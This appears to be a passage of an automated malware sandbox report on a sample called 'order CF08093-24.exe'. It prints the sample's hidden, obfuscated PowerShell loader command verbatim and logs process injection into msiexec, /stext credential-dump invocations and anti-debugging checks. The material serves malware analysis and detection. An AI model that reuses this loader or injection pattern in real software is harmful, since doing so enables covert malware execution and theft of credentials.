Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Spaltedefinitioner)), $Gujerat).DefineDynamicModule($Midnatssolens, $false).DefineType($Korsfarers, $Malemuit, [System.MulticastDelega
Source: C:\Users\user\Desktop\order CF08093-24.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25)
Source: C:\Users\user\Desktop\order CF08093-24.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25)
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 10_2_004044A4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_07490FC4 push es; iretd 2_2_07490FC7
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_235F2806 push ecx; ret 6_2_235F2819
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044693D push ecx; ret 10_2_0044694D
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00451D54 push eax; ret 10_2_00451D61
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0044B090 push eax; ret 11_2_0044B0A4
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0044B090 push eax; ret 11_2_0044B0CC
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00451D34 push eax; ret 11_2_00451D41
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00444E71 push ecx; ret 11_2_00444E81
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00414060 push eax; ret 12_2_00414074
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00414060 push eax; ret 12_2_0041409C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00414039 push ecx; ret 12_2_00414049
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_004164EB push 0000006Ah; retf 12_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00416553 push 0000006Ah; retf 12_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00416555 push 0000006Ah; retf 12_2_004165C4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\order CF08093-24.exe

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_004047CB
              Source: C:\Users\user\Desktop\order CF08093-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6743
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2881
              Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 9.2 %
              Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 8.3 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2076 Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 828 Thread sleep count: 235 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 828 Thread sleep time: -117500s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 736 Thread sleep count: 942 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 736 Thread sleep time: -2826000s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 736 Thread sleep count: 8556 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 736 Thread sleep time: -25668000s >= -30000s
              Source: C:\Users\user\Desktop\order CF08093-24.exe Code function: 0_2_0040689E FindFirstFileW,FindClose
              Source: C:\Users\user\Desktop\order CF08093-24.exe Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Users\user\Desktop\order CF08093-24.exe Code function: 0_2_00402930 FindFirstFileW
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_235F10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_235F6580 FindFirstFileExA
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040AE51 FindFirstFileW,FindNextFileW
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00418981 memset,GetSystemInfo
              Source: powershell.exe, 00000002.00000002.3110901476.00000000054C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter@\]q
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
              Source: ModuleAnalysisCache.2.dr Binary or memory string: Remove-NetEventVmNetworkAdapter
              Source: powershell.exe, 00000002.00000002.3110901476.00000000054C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter@\]q
              Source: ModuleAnalysisCache.2.dr Binary or memory string: Add-NetEventVmNetworkAdapter
              Source: powershell.exe, 00000002.00000002.3110396387.0000000002CB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VVpnClient.psMSFT_NetEventVmNetworkAdatper.format.ps1xml
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.3110901476.00000000054C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter@\]q
              Source: powershell.exe, 00000002.00000002.3110396387.0000000002CB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PS_VpnSeMSFT_NetEventVmNetworkAdatper.cdxml
              Source: ModuleAnalysisCache.2.dr Binary or memory string: Get-NetEventVmNetworkAdapter
              Source: C:\Users\user\Desktop\order CF08093-24.exe API call chain: ExitProcess graph end node graph_0-3714
              Source: C:\Users\user\Desktop\order CF08093-24.exe API call chain: ExitProcess graph end node graph_0-3722
              Source: C:\Windows\SysWOW64\msiexec.exe API call chain: ExitProcess graph end node graph_11-34012
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_235F8EC8 LdrInitializeThunk
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_235F2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_235F4AB4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_235F724E GetProcessHeap
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\msiexec.exe Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_235F2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_235F2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_235F60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3C60000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
              Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\aczzpbalucdoyblxcfryerxbbswqyinsk"
              Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dwmsp"
              Source: C:\Users\user\Desktop\order CF08093-24.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$amanuensissers25=gc -raw 'c:\users\user\appdata\local\temp\blankbook85\patchworkenes\resprmiernes\lynlaases\servicerende.gal55';$magnoliaceae=$amanuensissers25.substring(71792,3);.$magnoliaceae($amanuensissers25)
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\!
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\*b
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\:
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager.
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerx
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\t
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.4475133406.0000000007B39000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\*
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\i
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\10
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\ca
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, logs.dat.6.dr Binary or memory string: [Program Manager]
              Source: msiexec.exe, 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\M
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 6_2_235F2933 cpuid
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
